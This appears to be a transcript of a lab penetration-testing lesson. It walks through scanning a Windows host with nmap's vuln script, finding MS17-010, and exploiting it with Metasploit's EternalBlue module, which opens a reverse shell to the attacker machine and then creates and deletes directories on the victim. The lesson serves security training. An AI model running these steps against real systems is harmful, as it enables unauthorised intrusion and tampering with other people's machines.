Let's start with another example. Now today our target IP address is 10.35.1.155. So in first phase we need to find out all the vulnerabilities of the target machine. So in previous lesson we already check how to find out the vulnerability using Nessus. Alternatively, we can also find all the vulnerability using the nmap script vuln. So directly go to the terminal of Kali Linux and start to find the vulnerabilities using nmap script vuln. Nmap, then timing option T4, then script name is vuln and the IP address is 10.35.1.155. Starting nmap, and it will take some time to keep result. Okay, we got the result. It's showing the port 135 TCP port is open, 139 TCP port open, and port 445, 5357, 49152, 49153, 49154, 49155 and 49156 and 49157 TCP port is open, and it's showing Samba vuln CVE 2012-1182 status access denied. SMB vuln MS10-054 it also showing false. SMB vuln MS10-061 status access denied. SMB vuln MS17-010 it's showing vulnerable, and remote code execution vulnerability in Microsoft SMB version 1 server. So it's showing in the target machine MS17-010 vulnerability is present. Now we use Metasploit framework to exploit the target machine using the vulnerability name MS17-010. Let's start Metasploit. So by using the command msf console, we can open Metasploit. Now search for the exploit in Metasploit framework related to the vulnerability name MS17-010. We got 2 auxiliary and 2 exploit. So here we all only concerned about the exploit. Exploit Windows SMB MS17 underscore 010 underscore eternal blue. Disclosure date is 2017, and next one is exploit Windows SMB MS17 underscore 010 underscore PSEXEC. Disclosure date is also in 2017. So, let us start with the exploit Windows SMB MS17 underscore 010 underscore eternal blue. To use this exploit, we use the command use followed by the exploit name. Now, to check the available option, we need to use the command show options. Now, among from this all these option, now we only concern about the R host, that is remote host, means the IP address of the victim machine, and R port, that means open port of the victim machine. So, now set R host 10.35.1.155, which is the IP address of the target machine, and by default port 445 is selected, and from the previous result of vulnerability scanning we see port 445 is open in the target machine. So, no need to change the R port 445. Now, use the command exploit or run. Started reverse TCP handler on the attacker machine with IP address 10.35.1.153 and port 4444. Wow! We get the shell of the victim machine. Now, this is the command prompt of the victim machine. We can do anything from my attacker machine, that means from my Kali machine to the victim machine using this cell. So, this cell is basically the CMD of the victim machine. So, by using the command dir, we can check all the directory of the directory and file in system 32. Alternatively, we can also check any other list of directory in the victim machine. Suppose you want to check all the list of the file and directory in C drive, then go to the file system C and then use the command dir. Okay, we got all the list of file and directories in C drive. So, this is all the list of the directories. Now, we can also delete a directory or file, we can also create a file or directory in the specified location. By using the command mkdir, we can create a directory in the specified location. Now, see, I am creating a directory with the name hack. Now, check by the command dir and see a directory hack is created in C drive. Similarly, we can also delete any directory from any specified location. by using the command rmdir, we can remove any directory. Suppose now I want to remove the previously created directory hack. So, rmdir, then the directory name hack, directory deleted. Now, to check, use dir command. Now, see, there is no directory with the name hack. So, this is basically the command prompt of the victim machine. So, by using the command prompt of the victim machine from my Kali machine, I can handle the attacker, I can handle the victim machine. So, I am closing the session here now, and I will discuss further in the next session about the Metasploit framework.